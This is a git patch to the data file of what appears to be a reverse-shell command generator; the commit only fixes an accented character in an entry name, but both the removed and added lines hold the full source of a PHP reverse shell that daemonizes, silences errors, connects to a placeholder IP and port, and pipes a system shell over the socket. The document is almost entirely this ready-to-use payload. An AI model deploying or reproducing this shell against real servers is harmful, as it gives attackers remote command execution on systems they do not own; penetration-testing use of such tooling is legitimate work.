From 470ef407b62572675fab71605880c0e602fb81fd Mon Sep 17 00:00:00 2001
From: Ryan Montgomery <44453666+0dayCTF@users.noreply.github.com>
Date: Tue, 20 Jul 2021 20:33:22 -0400
Subject: [PATCH] Update data.js
Fixed Latin Char in new PHP Shell.
---
js/data.js | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/js/data.js b/js/data.js
index 0c22fed..5ecd0e7 100644
--- a/js/data.js
+++ b/js/data.js
@@ -120,8 +120,8 @@ const reverseShellCommands = withCommandType(
"meta": ["linux", "windows", "mac"]
},
{
- "name": "PHP Ivan Šincek",
- "command": " array(\'pipe\', \'r\'), // shell can read from STDIN\n 1 => array(\'pipe\', \'w\'), // shell can write to STDOUT\n 2 => array(\'pipe\', \'w\') // shell can write to STDERR\n );\n private $buffer = 1024; // read/write buffer size\n private $clen = 0; // command length\n private $error = false; // stream read/write error\n public function __construct($addr, $port) {\n $this->addr = $addr;\n $this->port = $port;\n }\n private function detect() {\n $detected = true;\n if (stripos(PHP_OS, \'LINUX\') !== false) { // same for macOS\n $this->os = \'LINUX\';\n $this->shell = \'{shell}\';\n } else if (stripos(PHP_OS, \'WIN32\') !== false || stripos(PHP_OS, \'WINNT\') !== false || stripos(PHP_OS, \'WINDOWS\') !== false) {\n $this->os = \'WINDOWS\';\n $this->shell = \'cmd.exe\';\n } else {\n $detected = false;\n echo \"SYS_ERROR: Underlying operating system is not supported, script will now exit...\\n\";\n }\n return $detected;\n }\n private function daemonize() {\n $exit = false;\n if (!function_exists(\'pcntl_fork\')) {\n echo \"DAEMONIZE: pcntl_fork() does not exists, moving on...\\n\";\n } else if (($pid = @pcntl_fork()) < 0) {\n echo \"DAEMONIZE: Cannot fork off the parent process, moving on...\\n\";\n } else if ($pid > 0) {\n $exit = true;\n echo \"DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n\";\n } else if (posix_setsid() < 0) {\n // once daemonized you will actually no longer see the script\'s dump\n echo \"DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n\";\n } else {\n echo \"DAEMONIZE: Completed successfully!\\n\";\n }\n return $exit;\n }\n private function settings() {\n @error_reporting(0);\n @set_time_limit(0); // do not impose the script execution time limit\n @umask(0); // set the file/directory permissions - 666 for files and 777 for directories\n }\n private function dump($data) {\n $data = str_replace(\'<\', \'<\', $data);\n $data = str_replace(\'>\', \'>\', $data);\n echo $data;\n }\n private function read($stream, $name, $buffer) {\n if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream\n $this->error = true; // set global error flag\n echo \"STRM_ERROR: Cannot read from ${name}, script will now exit...\\n\";\n }\n return $data;\n }\n private function write($stream, $name, $data) {\n if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream\n $this->error = true; // set global error flag\n echo \"STRM_ERROR: Cannot write to ${name}, script will now exit...\\n\";\n }\n return $bytes;\n }\n // read/write method for non-blocking streams\n private function rw($input, $output, $iname, $oname) {\n while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {\n if ($this->os === \'WINDOWS\' && $oname === \'STDIN\') { $this->clen += strlen($data); } // calculate the command length\n $this->dump($data); // script\'s dump\n }\n }\n // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)\n // we must read the exact byte length from a stream and not a single byte more\n private function brw($input, $output, $iname, $oname) {\n $fstat = fstat($input);\n $size = $fstat[\'size\'];\n if ($this->os === \'WINDOWS\' && $iname === \'STDOUT\' && $this->clen) {\n // for some reason Windows OS pipes STDIN into STDOUT\n // we do not like that\n // we need to discard the data from the stream\n while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {\n $this->clen -= $bytes;\n $size -= $bytes;\n }\n }\n while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {\n $size -= $bytes;\n $this->dump($data); // script\'s dump\n }\n }\n public function run() {\n if ($this->detect() && !$this->daemonize()) {\n $this->settings();\n\n // ----- SOCKET BEGIN -----\n $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);\n if (!$socket) {\n echo \"SOC_ERROR: {$errno}: {$errstr}\\n\";\n } else {\n stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns \'true\' on Windows OS\n\n // ----- SHELL BEGIN -----\n $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);\n if (!$process) {\n echo \"PROC_ERROR: Cannot start the shell\\n\";\n } else {\n foreach ($pipes as $pipe) {\n stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns \'false\' on Windows OS\n }\n\n // ----- WORK BEGIN -----\n $status = proc_get_status($process);\n @fwrite($socket, \"SOCKET: Shell has connected! PID: \" . $status[\'pid\'] . \"\\n\");\n do {\n\t\t\t\t\t\t$status = proc_get_status($process);\n if (feof($socket)) { // check for end-of-file on SOCKET\n echo \"SOC_ERROR: Shell connection has been terminated\\n\"; break;\n } else if (feof($pipes[1]) || !$status[\'running\']) { // check for end-of-file on STDOUT or if process is still running\n echo \"PROC_ERROR: Shell process has been terminated\\n\"; break; // feof() does not work with blocking streams\n } // use proc_get_status() instead\n $streams = array(\n \'read\' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR\n \'write\' => null,\n \'except\' => null\n );\n $num_changed_streams = @stream_select($streams[\'read\'], $streams[\'write\'], $streams[\'except\'], 0); // wait for stream changes | will not wait on Windows OS\n if ($num_changed_streams === false) {\n echo \"STRM_ERROR: stream_select() failed\\n\"; break;\n } else if ($num_changed_streams > 0) {\n if ($this->os === \'LINUX\') {\n if (in_array($socket , $streams[\'read\'])) { $this->rw($socket , $pipes[0], \'SOCKET\', \'STDIN\' ); } // read from SOCKET and write to STDIN\n if (in_array($pipes[2], $streams[\'read\'])) { $this->rw($pipes[2], $socket , \'STDERR\', \'SOCKET\'); } // read from STDERR and write to SOCKET\n if (in_array($pipes[1], $streams[\'read\'])) { $this->rw($pipes[1], $socket , \'STDOUT\', \'SOCKET\'); } // read from STDOUT and write to SOCKET\n } else if ($this->os === \'WINDOWS\') {\n // order is important\n if (in_array($socket, $streams[\'read\'])/*------*/) { $this->rw ($socket , $pipes[0], \'SOCKET\', \'STDIN\' ); } // read from SOCKET and write to STDIN\n if (($fstat = fstat($pipes[2])) && $fstat[\'size\']) { $this->brw($pipes[2], $socket , \'STDERR\', \'SOCKET\'); } // read from STDERR and write to SOCKET\n if (($fstat = fstat($pipes[1])) && $fstat[\'size\']) { $this->brw($pipes[1], $socket , \'STDOUT\', \'SOCKET\'); } // read from STDOUT and write to SOCKET\n }\n }\n } while (!$this->error);\n // ------ WORK END ------\n\n foreach ($pipes as $pipe) {\n fclose($pipe);\n }\n proc_close($process);\n }\n // ------ SHELL END ------\n\n fclose($socket);\n }\n // ------ SOCKET END ------\n\n }\n }\n}\necho \'\';\n// change the host address and/or port number as necessary\n$sh = new Shell(\'{ip}\', {port});\n$sh->run();\nunset($sh);\n// garbage collector requires PHP v5.3.0 or greater\n// @gc_collect_cycles();\necho \'\';\n?>",
+ "name": "PHP Ivan Sincek",
+ "command": " array(\'pipe\', \'r\'), // shell can read from STDIN\n 1 => array(\'pipe\', \'w\'), // shell can write to STDOUT\n 2 => array(\'pipe\', \'w\') // shell can write to STDERR\n );\n private $buffer = 1024; // read/write buffer size\n private $clen = 0; // command length\n private $error = false; // stream read/write error\n public function __construct($addr, $port) {\n $this->addr = $addr;\n $this->port = $port;\n }\n private function detect() {\n $detected = true;\n if (stripos(PHP_OS, \'LINUX\') !== false) { // same for macOS\n $this->os = \'LINUX\';\n $this->shell = \'{shell}\';\n } else if (stripos(PHP_OS, \'WIN32\') !== false || stripos(PHP_OS, \'WINNT\') !== false || stripos(PHP_OS, \'WINDOWS\') !== false) {\n $this->os = \'WINDOWS\';\n $this->shell = \'cmd.exe\';\n } else {\n $detected = false;\n echo \"SYS_ERROR: Underlying operating system is not supported, script will now exit...\\n\";\n }\n return $detected;\n }\n private function daemonize() {\n $exit = false;\n if (!function_exists(\'pcntl_fork\')) {\n echo \"DAEMONIZE: pcntl_fork() does not exists, moving on...\\n\";\n } else if (($pid = @pcntl_fork()) < 0) {\n echo \"DAEMONIZE: Cannot fork off the parent process, moving on...\\n\";\n } else if ($pid > 0) {\n $exit = true;\n echo \"DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n\";\n } else if (posix_setsid() < 0) {\n // once daemonized you will actually no longer see the script\'s dump\n echo \"DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n\";\n } else {\n echo \"DAEMONIZE: Completed successfully!\\n\";\n }\n return $exit;\n }\n private function settings() {\n @error_reporting(0);\n @set_time_limit(0); // do not impose the script execution time limit\n @umask(0); // set the file/directory permissions - 666 for files and 777 for directories\n }\n private function dump($data) {\n $data = str_replace(\'<\', \'<\', $data);\n $data = str_replace(\'>\', \'>\', $data);\n echo $data;\n }\n private function read($stream, $name, $buffer) {\n if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream\n $this->error = true; // set global error flag\n echo \"STRM_ERROR: Cannot read from ${name}, script will now exit...\\n\";\n }\n return $data;\n }\n private function write($stream, $name, $data) {\n if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream\n $this->error = true; // set global error flag\n echo \"STRM_ERROR: Cannot write to ${name}, script will now exit...\\n\";\n }\n return $bytes;\n }\n // read/write method for non-blocking streams\n private function rw($input, $output, $iname, $oname) {\n while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {\n if ($this->os === \'WINDOWS\' && $oname === \'STDIN\') { $this->clen += strlen($data); } // calculate the command length\n $this->dump($data); // script\'s dump\n }\n }\n // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)\n // we must read the exact byte length from a stream and not a single byte more\n private function brw($input, $output, $iname, $oname) {\n $fstat = fstat($input);\n $size = $fstat[\'size\'];\n if ($this->os === \'WINDOWS\' && $iname === \'STDOUT\' && $this->clen) {\n // for some reason Windows OS pipes STDIN into STDOUT\n // we do not like that\n // we need to discard the data from the stream\n while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {\n $this->clen -= $bytes;\n $size -= $bytes;\n }\n }\n while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {\n $size -= $bytes;\n $this->dump($data); // script\'s dump\n }\n }\n public function run() {\n if ($this->detect() && !$this->daemonize()) {\n $this->settings();\n\n // ----- SOCKET BEGIN -----\n $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);\n if (!$socket) {\n echo \"SOC_ERROR: {$errno}: {$errstr}\\n\";\n } else {\n stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns \'true\' on Windows OS\n\n // ----- SHELL BEGIN -----\n $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);\n if (!$process) {\n echo \"PROC_ERROR: Cannot start the shell\\n\";\n } else {\n foreach ($pipes as $pipe) {\n stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns \'false\' on Windows OS\n }\n\n // ----- WORK BEGIN -----\n $status = proc_get_status($process);\n @fwrite($socket, \"SOCKET: Shell has connected! PID: \" . $status[\'pid\'] . \"\\n\");\n do {\n\t\t\t\t\t\t$status = proc_get_status($process);\n if (feof($socket)) { // check for end-of-file on SOCKET\n echo \"SOC_ERROR: Shell connection has been terminated\\n\"; break;\n } else if (feof($pipes[1]) || !$status[\'running\']) { // check for end-of-file on STDOUT or if process is still running\n echo \"PROC_ERROR: Shell process has been terminated\\n\"; break; // feof() does not work with blocking streams\n } // use proc_get_status() instead\n $streams = array(\n \'read\' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR\n \'write\' => null,\n \'except\' => null\n );\n $num_changed_streams = @stream_select($streams[\'read\'], $streams[\'write\'], $streams[\'except\'], 0); // wait for stream changes | will not wait on Windows OS\n if ($num_changed_streams === false) {\n echo \"STRM_ERROR: stream_select() failed\\n\"; break;\n } else if ($num_changed_streams > 0) {\n if ($this->os === \'LINUX\') {\n if (in_array($socket , $streams[\'read\'])) { $this->rw($socket , $pipes[0], \'SOCKET\', \'STDIN\' ); } // read from SOCKET and write to STDIN\n if (in_array($pipes[2], $streams[\'read\'])) { $this->rw($pipes[2], $socket , \'STDERR\', \'SOCKET\'); } // read from STDERR and write to SOCKET\n if (in_array($pipes[1], $streams[\'read\'])) { $this->rw($pipes[1], $socket , \'STDOUT\', \'SOCKET\'); } // read from STDOUT and write to SOCKET\n } else if ($this->os === \'WINDOWS\') {\n // order is important\n if (in_array($socket, $streams[\'read\'])/*------*/) { $this->rw ($socket , $pipes[0], \'SOCKET\', \'STDIN\' ); } // read from SOCKET and write to STDIN\n if (($fstat = fstat($pipes[2])) && $fstat[\'size\']) { $this->brw($pipes[2], $socket , \'STDERR\', \'SOCKET\'); } // read from STDERR and write to SOCKET\n if (($fstat = fstat($pipes[1])) && $fstat[\'size\']) { $this->brw($pipes[1], $socket , \'STDOUT\', \'SOCKET\'); } // read from STDOUT and write to SOCKET\n }\n }\n } while (!$this->error);\n // ------ WORK END ------\n\n foreach ($pipes as $pipe) {\n fclose($pipe);\n }\n proc_close($process);\n }\n // ------ SHELL END ------\n\n fclose($socket);\n }\n // ------ SOCKET END ------\n\n }\n }\n}\necho \'\';\n// change the host address and/or port number as necessary\n$sh = new Shell(\'{ip}\', {port});\n$sh->run();\nunset($sh);\n// garbage collector requires PHP v5.3.0 or greater\n// @gc_collect_cycles();\necho \'\';\n?>",
"meta": ["linux", "windows", "mac"]
},
{